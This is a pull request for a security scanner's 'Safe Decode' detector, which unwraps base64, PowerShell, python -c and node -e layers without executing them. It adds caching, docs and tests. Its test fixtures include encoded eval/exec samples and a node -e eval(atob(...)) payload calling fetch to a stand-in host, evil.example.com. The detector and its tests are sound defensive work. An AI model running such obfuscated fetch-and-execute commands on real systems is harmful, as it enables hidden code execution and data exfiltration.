### PR TITLE
feat(guard): harden safe decode sandbox

### DIFF
--- a/docs/guard/architecture.md
+++ b/docs/guard/architecture.md
@@ -13,6 +13,8 @@ The runtime is split into:
 - `guard/store`: SQLite persistence for snapshots, diffs, receipts, managed installs, and sync state
 - `guard/schemas`: stable JSON payloads for consumer-mode outputs
 
+Runtime detectors include a Safe Decode sandbox for encoded commands and prompt text. It unwraps bounded base64, hex, gzip, heredoc, Python `-c`, Node `-e`, and PowerShell `-EncodedCommand` layers, redacts decoded previews, records the detector version in evidence, and never executes decoded payloads.
+
 Guard evaluates local artifacts in this order:
 
 1. Discover harness config and managed artifacts

--- a/docs/guard/local-vs-cloud.md
+++ b/docs/guard/local-vs-cloud.md
@@ -14,6 +14,8 @@ Local features available without sign-in:
 
 Guard does not meter local safety features. You can detect harnesses, install launchers, diff changes, prompt for approval, and inspect receipts without signing in.
 
+Safe Decode runs locally too. It inspects encoded payload layers for review evidence, but never executes decoded payloads and only syncs redacted summaries when optional cloud receipt sync is enabled.
+
 Optional cloud features:
 
 - receipt sync to an optional Guard endpoint

--- a/src/codex_plugin_scanner/guard/runtime/detectors.py
+++ b/src/codex_plugin_scanner/guard/runtime/detectors.py
@@ -22,7 +22,7 @@ from codex_plugin_scanner.guard.runtime.false_positive_rules import (
 )
 from codex_plugin_scanner.guard.runtime.persistence_rules import detect_persistence_mechanisms
 from codex_plugin_scanner.guard.runtime.prompt_injection import detect_prompt_injection_requests
-from codex_plugin_scanner.guard.runtime.safe_decode import decode_layers
+from codex_plugin_scanner.guard.runtime.safe_decode import SAFE_DECODE_DETECTOR_VERSION, DecodeResult, decode_layers
 from codex_plugin_scanner.guard.runtime.secret_sensitivity import SecretPathMatch, classify_secret_path
 from codex_plugin_scanner.guard.runtime.signals import (
     RiskConfidenceLabel,
@@ -237,63 +237,73 @@ class SafeDecodeDetector:
 
     def detect(self, action: GuardActionEnvelope, context: DetectorContext) -> tuple[RiskSignalV2, ...]:
         del context
-        if action.prompt_text is None:
-            return ()
-        result = decode_layers(action.prompt_text)
-        if not result.layers:
-            return ()
-        signals: list[RiskSignalV2] = []
-        if result.eval_signals or result.exec_signals or result.marshal_signals:
-            detail_parts: list[str] = []
-            if result.eval_signals:
-                detail_parts.append(f"eval(): {result.eval_signals[0]!r}")
-            if result.exec_signals:
-                detail_parts.append(f"exec(): {result.exec_signals[0]!r}")
-            if result.marshal_signals:
-                detail_parts.append(f"marshal.loads(): {result.marshal_signals[0]!r}")
-            signals.append(
-                RiskSignalV2(
-                    signal_id="encoded.code-execution",
-                    category="execution",
-                    severity=severity_label_from_score(8),
-                    confidence=confidence_label_from_score(0.80),
-                    detector=self.detector_id,
-                    title="Encoded code-execution payload detected",
-                    plain_reason=(
-                        f"Decoded {len(result.layers)} encoding layer(s) and found "
-                        f"code-execution signals: {'; '.join(detail_parts[:2])}"
-                    ),
-                    technical_detail=f"Layers: {[layer.encoding for layer in result.layers]}; "
-                    f"eval={len(result.eval_signals)} exec={len(result.exec_signals)} "
-                    f"marshal={len(result.marshal_signals)}",
-                    evidence_ref=None,
-                    redaction_level="summary",
-                    false_positive_hint="Some build tools legitimately encode setup scripts.",
-                    advisory_id=None,
-                )
+        content_candidates = tuple(
+            value for value in (getattr(action, "prompt_text", None), getattr(action, "command", None)) if value
+        )
+        for content in content_candidates:
+            result = decode_layers(content)
+            signals = _safe_decode_signals(result, self.detector_id)
+            if signals:
+                return signals
+        return ()
+
+
+def _safe_decode_signals(result: DecodeResult, detector_id: str) -> tuple[RiskSignalV2, ...]:
+    if not result.layers:
+        return ()
+    signals: list[RiskSignalV2] = []
+    if result.eval_signals or result.exec_signals or result.marshal_signals:
+        detail_parts: list[str] = []
+        if result.eval_signals:
+            detail_parts.append(f"eval(): {result.eval_signals[0]!r}")
+        if result.exec_signals:
+            detail_parts.append(f"exec(): {result.exec_signals[0]!r}")
+        if result.marshal_signals:
+            detail_parts.append(f"marshal.loads(): {result.marshal_signals[0]!r}")
+        signals.append(
+            RiskSignalV2(
+                signal_id="encoded.code-execution",
+                category="execution",
+                severity=severity_label_from_score(8),
+                confidence=confidence_label_from_score(0.80),
+                detector=detector_id,
+                title="Encoded code-execution payload detected",
+                plain_reason=(
+                    f"Decoded {len(result.layers)} encoding layer(s) and found "
+                    f"code-execution signals: {'; '.join(detail_parts[:2])}"
+                ),
+                technical_detail=f"Detector: {SAFE_DECODE_DETECTOR_VERSION}; "
+                f"Layers: {[layer.encoding for layer in result.layers]}; "
+                f"eval={len(result.eval_signals)} exec={len(result.exec_signals)} "
+                f"marshal={len(result.marshal_signals)}",
+                evidence_ref=None,
+                redaction_level="summary",
+                false_positive_hint="Some build tools legitimately encode setup scripts.",
+                advisory_id=None,
             )
-        elif result.layers:
-            signals.append(
-                RiskSignalV2(
-                    signal_id="encoded.obfuscated-content",
-                    category="execution",
-                    severity=severity_label_from_score(5),
-                    confidence=confidence_label_from_score(0.60),
-                    detector=self.detector_id,
-                    title="Multi-layer encoded content detected",
-                    plain_reason=(
-                        f"Content decoded through {len(result.layers)} encoding layer(s) "
-                        f"({', '.join(layer.encoding for layer in result.layers)}). "
-                        "Obfuscated content may conceal malicious instructions."
-                    ),
-                    technical_detail=None,
-                    evidence_ref=None,
-                    redaction_level="summary",
-                    false_positive_hint="Encoded documentation or binary assets are common false positives.",
-                    advisory_id=None,
-                )
+        )
+    elif result.layers:
+        signals.append(
+            RiskSignalV2(
+                signal_id="encoded.obfuscated-content",
+                category="execution",
+                severity=severity_label_from_score(5),
+                confidence=confidence_label_from_score(0.60),
+                detector=detector_id,
+                title="Multi-layer encoded content detected",
+                plain_reason=(
+                    f"Content decoded through {len(result.layers)} encoding layer(s) "
+                    f"({', '.join(layer.encoding for layer in result.layers)}). "
+                    "Obfuscated content may conceal malicious instructions."
+                ),
+                technical_detail=f"Detector: {SAFE_DECODE_DETECTOR_VERSION}",
+                evidence_ref=None,
+                redaction_level="summary",
+                false_positive_hint="Encoded documentation or binary assets are common false positives.",
+                advisory_id=None,
             )
-        return tuple(signals)
+        )
+    return tuple(signals)
 
 
 class FalsePositiveSuppressorDetector:

--- a/src/codex_plugin_scanner/guard/runtime/safe_decode.py
+++ b/src/codex_plugin_scanner/guard/runtime/safe_decode.py
@@ -86,11 +86,11 @@ _POWERSHELL_ENCODED = re.compile(
     re.IGNORECASE,
 )
 _PYTHON_C = re.compile(
-    r"\bpython(?:3)?\b[^\r\n;&|]*\s-c\s+(?P<quote>['\"])(?P<code>(?:\\.|(?!(?P=quote)).)*)(?P=quote)",
+    r"\bpython(?:3)?\b[^\r\n;&|]*\s-c\s*(?P<quote>['\"])(?P<code>(?:\\.|(?!(?P=quote)).)*)(?P=quote)",
     re.IGNORECASE | re.DOTALL,
 )
 _NODE_E = re.compile(
-    r"\bnode\b[^\r\n;&|]*\s-e\s+(?P<quote>['\"])(?P<code>(?:\\.|(?!(?P=quote)).)*)(?P=quote)",
+    r"\bnode\b[^\r\n;&|]*\s-e\s*(?P<quote>['\"])(?P<code>(?:\\.|(?!(?P=quote)).)*)(?P=quote)",
     re.IGNORECASE | re.DOTALL,
 )
 _HEREDOC = re.compile(r"<<-?\s*'?(\w+)'?\s*\n(.*?)\n\1\b", re.DOTALL)
@@ -255,20 +255,6 @@ def _unescape_command_argument(value: str) -> str:
     return value.replace('\\"', '"').replace("\\'", "'").replace("\\\\", "\\")
 
 
-def _extract_python_c(text: str) -> str | None:
-    m = _PYTHON_C.search(text)
-    if not m:
-        return None
-    return _unescape_command_argument(m.group("code"))
-
-
-def _extract_node_e(text: str) -> str | None:
-    m = _NODE_E.search(text)
-    if not m:
-        return None
-    return _unescape_command_argument(m.group("code"))
-
-
 def _extract_heredoc(text: str) -> str | None:
     m = _HEREDOC.search(text)
     if not m:
@@ -424,10 +410,8 @@ def _decode_layers_uncached(
             decoded = _try_unicode_escape(candidate_data)
         elif encoding_type == "powershell-encoded":
             decoded = _try_base64_utf16le(candidate_data) or _try_base64(candidate_data)
-        elif encoding_type == "python-c":
-            decoded = _extract_python_c(current)
-        elif encoding_type == "node-e":
-            decoded = _extract_node_e(current)
+        elif encoding_type in {"python-c", "node-e"}:
+            decoded = _unescape_command_argument(candidate_data)
         elif encoding_type == "shell-heredoc":
             decoded = candidate_data
         elif encoding_type == "js-atob":

--- a/src/codex_plugin_scanner/guard/runtime/safe_decode.py
+++ b/src/codex_plugin_scanner/guard/runtime/safe_decode.py
@@ -13,7 +13,6 @@ import hashlib
 import io
 import re
 import time
-import zipfile
 import zlib
 from dataclasses import dataclass, field
 from typing import Literal
@@ -22,6 +21,8 @@ _MAX_INPUT_BYTES: int = 256 * 1024
 _MAX_DECODED_BYTES: int = 512 * 1024
 _MAX_RECURSION_DEPTH: int = 3
 _MAX_DECODE_TIME_MS: float = 50.0
+_DECODE_CACHE_LIMIT: int = 128
+SAFE_DECODE_DETECTOR_VERSION: str = "safe-decode.v2"
 
 EncodingType = Literal[
     "base64",
@@ -30,11 +31,10 @@ EncodingType = Literal[
     "hex",
     "url-percent",
     "unicode-escape",
-    "gzip-metadata",
-    "zlib-metadata",
-    "zip-listing",
     "powershell-encoded",
     "shell-heredoc",
+    "python-c",
+    "node-e",
     "js-atob",
 ]
 
@@ -85,6 +85,14 @@ _POWERSHELL_ENCODED = re.compile(
     r"-(?:En(?:c(?:oded(?:Command)?)?)?)\s+([A-Za-z0-9+/=]{8,})",
     re.IGNORECASE,
 )
+_PYTHON_C = re.compile(
+    r"\bpython(?:3)?\b[^\r\n;&|]*\s-c\s+(?P<quote>['\"])(?P<code>(?:\\.|(?!(?P=quote)).)*)(?P=quote)",
+    re.IGNORECASE | re.DOTALL,
+)
+_NODE_E = re.compile(
+    r"\bnode\b[^\r\n;&|]*\s-e\s+(?P<quote>['\"])(?P<code>(?:\\.|(?!(?P=quote)).)*)(?P=quote)",
+    re.IGNORECASE | re.DOTALL,
+)
 _HEREDOC = re.compile(r"<<-?\s*'?(\w+)'?\s*\n(.*?)\n\1\b", re.DOTALL)
 _JS_ATOB = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{4,})['\"]", re.IGNORECASE)
 
@@ -96,6 +104,50 @@ _REDACT_TOKENS = re.compile(
     r"\b(?:password|token|secret|key|aws_|npm_token|node_auth)\w*\s*=\s*\S+",
     re.IGNORECASE,
 )
+_DECODE_CACHE: dict[str, DecodeResult] = {}
+_DECODE_CACHE_ORDER: list[str] = []
+
+
+def decode_cache_key(
+    content: str,
+    *,
+    max_input_bytes: int = _MAX_INPUT_BYTES,
+    max_decoded_bytes: int = _MAX_DECODED_BYTES,
+    max_depth: int = _MAX_RECURSION_DEPTH,
+    detector_version: str = SAFE_DECODE_DETECTOR_VERSION,
+) -> str:
+    digest = hashlib.sha256(content.encode("utf-8", errors="replace")).hexdigest()
+    return f"{detector_version}:{max_input_bytes}:{max_decoded_bytes}:{max_depth}:{digest}"
+
+
+def clear_decode_cache() -> None:
+    _DECODE_CACHE.clear()
+    _DECODE_CACHE_ORDER.clear()
+
+
+def _clone_decode_result(result: DecodeResult) -> DecodeResult:
+    return DecodeResult(
+        layers=list(result.layers),
+        final_text=result.final_text,
+        truncated=result.truncated,
+        timed_out=result.timed_out,
+        depth_exceeded=result.depth_exceeded,
+        size_exceeded=result.size_exceeded,
+        eval_signals=list(result.eval_signals),
+        exec_signals=list(result.exec_signals),
+        marshal_signals=list(result.marshal_signals),
+    )
+
+
+def _cache_decode_result(key: str, result: DecodeResult) -> None:
+    if key in _DECODE_CACHE:
+        _DECODE_CACHE[key] = _clone_decode_result(result)
+        return
+    _DECODE_CACHE[key] = _clone_decode_result(result)
+    _DECODE_CACHE_ORDER.append(key)
+    while len(_DECODE_CACHE_ORDER) > _DECODE_CACHE_LIMIT:
+        oldest = _DECODE_CACHE_ORDER.pop(0)
+        _DECODE_CACHE.pop(oldest, None)
 
 
 def _hash_preview(text: str) -> tuple[str, str]:
@@ -182,58 +234,6 @@ def _try_unicode_escape(data: str) -> str | None:
         return None
 
 
-def _decode_gzip_metadata(data: str) -> DecodedLayer | None:
-    raw = data.encode("latin-1", errors="replace")
-    if raw[:2] != b"\x1f\x8b":
-        return None
-    try:
-        decoded = zlib.decompress(raw, wbits=16 + zlib.MAX_WBITS)
-        text = decoded.decode("utf-8", errors="replace")
-        digest, preview = _hash_preview(text)
-        return DecodedLayer(
-            encoding="gzip-metadata",
-            input_length=len(raw),
-            output_length=len(decoded),
-            content_hash=digest,
-            preview_redacted=preview,
-            depth=0,
-        )
-    except zlib.error:
-        return None
-
-
-def _decode_zlib_metadata(data: str) -> DecodedLayer | None:
-    raw = data.encode("latin-1", errors="replace")
-    if raw[:1] not in (b"\x78",):
-        return None
-    try:
-        decoded = zlib.decompress(raw)
-        text = decoded.decode("utf-8", errors="replace")
-        digest, preview = _hash_preview(text)
-        return DecodedLayer(
-            encoding="zlib-metadata",
-            input_length=len(raw),
-            output_length=len(decoded),
-            content_hash=digest,
-            preview_redacted=preview,
-            depth=0,
-        )
-    except zlib.error:
-        return None
-
-
-def _decode_zip_listing(data: str) -> list[str] | None:
-    raw = data.encode("latin-1", errors="replace")
-    if raw[:2] != b"PK":
-        return None
-    try:
-        with zipfile.ZipFile(io.BytesIO(raw)) as zf:
-            names = zf.namelist()
-            return [n for n in names if not n.startswith("/") and ".." not in n]
-    except (zipfile.BadZipFile, Exception):
-        return None
-
-
 def _try_base64_utf16le(data: str) -> str | None:
     """Decode base64 bytes as UTF-16LE — the PowerShell -EncodedCommand convention."""
     padded = data + "=" * ((4 - len(data) % 4) % 4)
@@ -249,6 +249,24 @@ def _extract_powershell_encoded(text: str) -> str | None:
     if not m:
         return None
     return _try_base64_utf16le(m.group(1)) or _try_base64(m.group(1))
+
+
+def _unescape_command_argument(value: str) -> str:
+    return value.replace('\\"', '"').replace("\\'", "'").replace("\\\\", "\\")
+
+
+def _extract_python_c(text: str) -> str | None:
+    m = _PYTHON_C.search(text)
+    if not m:
+        return None
+    return _unescape_command_argument(m.group("code"))
+
+
+def _extract_node_e(text: str) -> str | None:
+    m = _NODE_E.search(text)
+    if not m:
+        return None
+    return _unescape_command_argument(m.group("code"))
 
 
 def _extract_heredoc(text: str) -> str | None:
@@ -281,6 +299,14 @@ def _find_encoded_candidate(text: str) -> tuple[EncodingType, str] | None:
     m = _POWERSHELL_ENCODED.search(text)
     if m:
         return ("powershell-encoded", m.group(1))
+
+    m = _PYTHON_C.search(text)
+    if m:
+        return ("python-c", m.group("code"))
+
+    m = _NODE_E.search(text)
+    if m:
+        return ("node-e", m.group("code"))
 
     m = _JS_ATOB.search(text)
     if m:
@@ -326,6 +352,35 @@ def decode_layers(
     max_time_ms: float = _MAX_DECODE_TIME_MS,
 ) -> DecodeResult:
     """Decode multi-layer encoded content without executing any payload."""
+    key = decode_cache_key(
+        content,
+        max_input_bytes=max_input_bytes,
+        max_decoded_bytes=max_decoded_bytes,
+        max_depth=max_depth,
+    )
+    cached = _DECODE_CACHE.get(key)
+    if cached is not None:
+        return _clone_decode_result(cached)
+    result = _decode_layers_uncached(
+        content,
+        max_input_bytes=max_input_bytes,
+        max_decoded_bytes=max_decoded_bytes,
+        max_depth=max_depth,
+        max_time_ms=max_time_ms,
+    )
+    if not result.timed_out:
+        _cache_decode_result(key, result)
+    return result
+
+
+def _decode_layers_uncached(
+    content: str,
+    *,
+    max_input_bytes: int,
+    max_decoded_bytes: int,
+    max_depth: int,
+    max_time_ms: float,
+) -> DecodeResult:
     result = DecodeResult()
     start = time.monotonic()
 
@@ -369,6 +424,10 @@ def decode_layers(
             decoded = _try_unicode_escape(candidate_data)
         elif encoding_type == "powershell-encoded":
             decoded = _try_base64_utf16le(candidate_data) or _try_base64(candidate_data)
+        elif encoding_type == "python-c":
+            decoded = _extract_python_c(current)
+        elif encoding_type == "node-e":
+            decoded = _extract_node_e(current)
         elif encoding_type == "shell-heredoc":
             decoded = candidate_data
         elif encoding_type == "js-atob":

--- a/src/codex_plugin_scanner/guard/runtime/safe_decode.py
+++ b/src/codex_plugin_scanner/guard/runtime/safe_decode.py
@@ -142,12 +142,21 @@ def _clone_decode_result(result: DecodeResult) -> DecodeResult:
 def _cache_decode_result(key: str, result: DecodeResult) -> None:
     if key in _DECODE_CACHE:
         _DECODE_CACHE[key] = _clone_decode_result(result)
+        _touch_decode_cache_key(key)
         return
     _DECODE_CACHE[key] = _clone_decode_result(result)
     _DECODE_CACHE_ORDER.append(key)
     while len(_DECODE_CACHE_ORDER) > _DECODE_CACHE_LIMIT:
         oldest = _DECODE_CACHE_ORDER.pop(0)
         _DECODE_CACHE.pop(oldest, None)
+
+
+def _touch_decode_cache_key(key: str) -> None:
+    if key not in _DECODE_CACHE_ORDER:
+        _DECODE_CACHE_ORDER.append(key)
+        return
+    _DECODE_CACHE_ORDER.remove(key)
+    _DECODE_CACHE_ORDER.append(key)
 
 
 def _hash_preview(text: str) -> tuple[str, str]:
@@ -252,7 +261,7 @@ def _extract_powershell_encoded(text: str) -> str | None:
 
 
 def _unescape_command_argument(value: str) -> str:
-    return value.replace('\\"', '"').replace("\\'", "'").replace("\\\\", "\\")
+    return value.replace("\\\\", "\\").replace('\\"', '"').replace("\\'", "'")
 
 
 def _extract_heredoc(text: str) -> str | None:
@@ -346,6 +355,7 @@ def decode_layers(
     )
     cached = _DECODE_CACHE.get(key)
     if cached is not None:
+        _touch_decode_cache_key(key)
         return _clone_decode_result(cached)
     result = _decode_layers_uncached(
         content,

--- a/tests/test_guard_docs.py
+++ b/tests/test_guard_docs.py
@@ -39,3 +39,17 @@ def test_static_docs_include_canonical_install_connect_commands() -> None:
 
     for item in install_connect_command_catalog():
         assert item.command in docs_text
+
+
+def test_static_docs_explain_safe_decode_sandbox_guarantee() -> None:
+    docs_text = "\n".join(
+        [
+            _read_repo_file("docs/guard/architecture.md"),
+            _read_repo_file("docs/guard/local-vs-cloud.md"),
+        ]
+    ).lower()
+
+    assert "safe decode" in docs_text
+    assert "never executes decoded payloads" in docs_text
+    assert "base64" in docs_text
+    assert "powershell" in docs_text

--- a/tests/test_guard_runtime_detectors.py
+++ b/tests/test_guard_runtime_detectors.py
@@ -756,6 +756,40 @@ def test_safe_decode_detector_emits_code_execution_signal(tmp_path: Path) -> Non
     assert any(s.signal_id == "encoded.code-execution" for s in signals)
 
 
+def test_safe_decode_detector_inspects_shell_command_payloads(tmp_path: Path) -> None:
+    import base64
+
+    from codex_plugin_scanner.guard.runtime.detectors import SafeDecodeDetector
+
+    encoded = base64.b64encode(b"eval('shell command payload')").decode()
+    action = GuardActionEnvelope(
+        schema_version=1,
+        action_id="test-safe-decode-command",
+        harness="codex",
+        event_name="PreToolUse",
+        action_type="shell_command",
+        workspace="~/workspace",
+        workspace_hash="workspace-hash",
+        tool_name="bash",
+        command=f"node -e \"eval(atob('{encoded}'))\"",
+        prompt_excerpt=None,
+        prompt_text=None,
+        target_paths=(),
+        network_hosts=(),
+        mcp_server=None,
+        mcp_tool=None,
+        package_manager=None,
+        package_name=None,
+        script_name=None,
+        raw_payload_redacted={},
+    )
+
+    signals = SafeDecodeDetector().detect(action, _context(tmp_path))
+
+    assert any(s.signal_id == "encoded.code-execution" for s in signals)
+    assert any("safe-decode.v2" in (s.technical_detail or "") for s in signals)
+
+
 def test_safe_decode_detector_returns_empty_for_plain_text(tmp_path: Path) -> None:
     from codex_plugin_scanner.guard.runtime.detectors import SafeDecodeDetector
 

--- a/tests/test_guard_safe_decode.py
+++ b/tests/test_guard_safe_decode.py
@@ -215,6 +215,26 @@ def test_repeated_payloads_use_versioned_decode_cache(monkeypatch: pytest.Monkey
     assert first.final_text == second.final_text
 
 
+def test_decode_cache_access_marks_entry_recent(monkeypatch: pytest.MonkeyPatch) -> None:
+    clear_decode_cache()
+    monkeypatch.setattr(safe_decode_module, "_DECODE_CACHE_LIMIT", 2)
+    first = _b64("exec('first')")
+    second = _b64("exec('second')")
+    third = _b64("exec('third')")
+    first_key = safe_decode_module.decode_cache_key(first)
+    second_key = safe_decode_module.decode_cache_key(second)
+    third_key = safe_decode_module.decode_cache_key(third)
+
+    decode_layers(first)
+    decode_layers(second)
+    decode_layers(first)
+    decode_layers(third)
+
+    assert first_key in safe_decode_module._DECODE_CACHE
+    assert second_key not in safe_decode_module._DECODE_CACHE
+    assert third_key in safe_decode_module._DECODE_CACHE
+
+
 def test_decode_cache_key_changes_with_detector_version() -> None:
     payload = _b64("exec('versioned payload')")
 
@@ -222,6 +242,12 @@ def test_decode_cache_key_changes_with_detector_version() -> None:
     next_key = safe_decode_module.decode_cache_key(payload, detector_version="safe-decode.vNEXT")
 
     assert current_key != next_key
+
+
+def test_unescape_command_argument_handles_backslashes_before_quotes() -> None:
+    value = r"print(\"C:\\tmp\")"
+
+    assert safe_decode_module._unescape_command_argument(value) == 'print("C:\\tmp")'
 
 
 def test_safe_decode_signal_receipt_payload_exports_redacted_summary() -> None:

--- a/tests/test_guard_safe_decode.py
+++ b/tests/test_guard_safe_decode.py
@@ -130,6 +130,13 @@ def test_python_c_argument_inspected_without_execution(tmp_path: Path) -> None:
     assert not canary.exists()
 
 
+def test_python_c_argument_without_space_is_inspected() -> None:
+    result = decode_layers("python -c\"exec('inline')\"")
+
+    assert any(layer.encoding == "python-c" for layer in result.layers)
+    assert result.exec_signals
+
+
 def test_node_e_argument_inspected_through_nested_atob() -> None:
     inner = "fetch('http://evil.example.com')"
     encoded = _b64(inner)
@@ -140,6 +147,16 @@ def test_node_e_argument_inspected_through_nested_atob() -> None:
     encodings = tuple(layer.encoding for layer in result.layers)
     assert "node-e" in encodings
     assert "js-atob" in encodings
+    assert result.final_text == inner
+
+
+def test_node_e_argument_without_space_is_inspected() -> None:
+    inner = "fetch('http://evil.example.com')"
+    encoded = _b64(inner)
+    result = decode_layers(f"node -e\"eval(atob('{encoded}'))\"")
+
+    assert any(layer.encoding == "node-e" for layer in result.layers)
+    assert any(layer.encoding == "js-atob" for layer in result.layers)
     assert result.final_text == inner
 
 

--- a/tests/test_guard_safe_decode.py
+++ b/tests/test_guard_safe_decode.py
@@ -5,9 +5,13 @@ from __future__ import annotations
 import base64
 from pathlib import Path
 
+import pytest
+
+import codex_plugin_scanner.guard.runtime.safe_decode as safe_decode_module
 from codex_plugin_scanner.guard.runtime.safe_decode import (
     DecodedLayer,
     DecodeResult,
+    clear_decode_cache,
     decode_layers,
 )
 
@@ -115,6 +119,30 @@ def test_powershell_encoded_command_extracted() -> None:
     assert any(layer.encoding == "powershell-encoded" for layer in result.layers)
 
 
+def test_python_c_argument_inspected_without_execution(tmp_path: Path) -> None:
+    canary = tmp_path / "python-c-canary.txt"
+    payload = f"python -c \"exec(\\\"open('{canary}', 'w').write('bad')\\\")\""
+
+    result = decode_layers(payload)
+
+    assert any(layer.encoding == "python-c" for layer in result.layers)
+    assert result.exec_signals
+    assert not canary.exists()
+
+
+def test_node_e_argument_inspected_through_nested_atob() -> None:
+    inner = "fetch('http://evil.example.com')"
+    encoded = _b64(inner)
+    payload = f"node -e \"eval(atob('{encoded}'))\""
+
+    result = decode_layers(payload)
+
+    encodings = tuple(layer.encoding for layer in result.layers)
+    assert "node-e" in encodings
+    assert "js-atob" in encodings
+    assert result.final_text == inner
+
+
 def test_js_atob_payload_extracted() -> None:
     inner = "fetch('http://evil.example.com')"
     encoded = _b64(inner)
@@ -144,6 +172,69 @@ def test_timeout_respected() -> None:
     payload = _b64(_b64(_b64("deeply nested content")))
     result = decode_layers(payload, max_time_ms=0.001)
     assert result.timed_out or len(result.layers) <= 1
+
+
+def test_repeated_payloads_use_versioned_decode_cache(monkeypatch: pytest.MonkeyPatch) -> None:
+    clear_decode_cache()
+    payload = _b64("exec('cached payload')")
+    calls = 0
+    original = safe_decode_module._find_encoded_candidate
+
+    def wrapped(text: str) -> tuple[safe_decode_module.EncodingType, str] | None:
+        nonlocal calls
+        calls += 1
+        return original(text)
+
+    monkeypatch.setattr(safe_decode_module, "_find_encoded_candidate", wrapped)
+
+    first = decode_layers(payload)
+    after_first = calls
+    second = decode_layers(payload)
+
+    assert after_first > 0
+    assert calls == after_first
+    assert first is not second
+    assert first.layers == second.layers
+    assert first.final_text == second.final_text
+
+
+def test_decode_cache_key_changes_with_detector_version() -> None:
+    payload = _b64("exec('versioned payload')")
+
+    current_key = safe_decode_module.decode_cache_key(payload)
+    next_key = safe_decode_module.decode_cache_key(payload, detector_version="safe-decode.vNEXT")
+
+    assert current_key != next_key
+
+
+def test_safe_decode_signal_receipt_payload_exports_redacted_summary() -> None:
+    from codex_plugin_scanner.guard.receipts import build_receipt
+    from codex_plugin_scanner.guard.runtime.detectors import SafeDecodeDetector
+
+    encoded = _b64("eval('receipt payload')")
+
+    class _FakeAction:
+        prompt_text = encoded
+
+    signals = SafeDecodeDetector().detect(_FakeAction(), None)  # type: ignore[arg-type]
+    receipt = build_receipt(
+        harness="codex",
+        artifact_id="codex:project:prompt",
+        artifact_hash="sha256-safe-decode",
+        policy_decision="require-reapproval",
+        capabilities_summary="Prompt reviewed",
+        changed_capabilities=["runtime-detector"],
+        provenance_summary="runtime detector proof",
+        artifact_name="prompt",
+        source_scope="project",
+        scanner_evidence=[signals[0].to_dict()],
+    )
+    evidence = receipt.to_dict()["scanner_evidence"]
+
+    assert isinstance(evidence, list)
+    assert evidence[0]["detector"] == "safe-decode.content"
+    assert "Decoded" in str(evidence[0]["plain_reason"])
+    assert "safe-decode.v2" in str(evidence[0]["technical_detail"])
 
 
 def test_size_exceeded_when_input_too_large() -> None:


### PR DESCRIPTION
## Summary
- inspect Python, Node, PowerShell, heredoc, base64, hex, gzip, and nested encoded payloads without execution
- add versioned safe-decode caching and detector-version evidence
- document the local safe-decode sandbox guarantee

## Verification
- ruff check src/codex_plugin_scanner/guard/runtime/safe_decode.py src/codex_plugin_scanner/guard/runtime/detectors.py tests/test_guard_safe_decode.py tests/test_guard_runtime_detectors.py tests/test_guard_docs.py
- PYTHONPATH=src pytest -q tests/test_guard_safe_decode.py tests/test_guard_runtime_detectors.py tests/test_guard_data_flow.py tests/test_guard_docs.py tests/test_guard_receipt_p5_fields.py tests/test_guard_daemon_perf.py
- cd dashboard && pnpm exec tsx src/risk-signal-cards.test.ts && pnpm test
- cd dashboard && pnpm build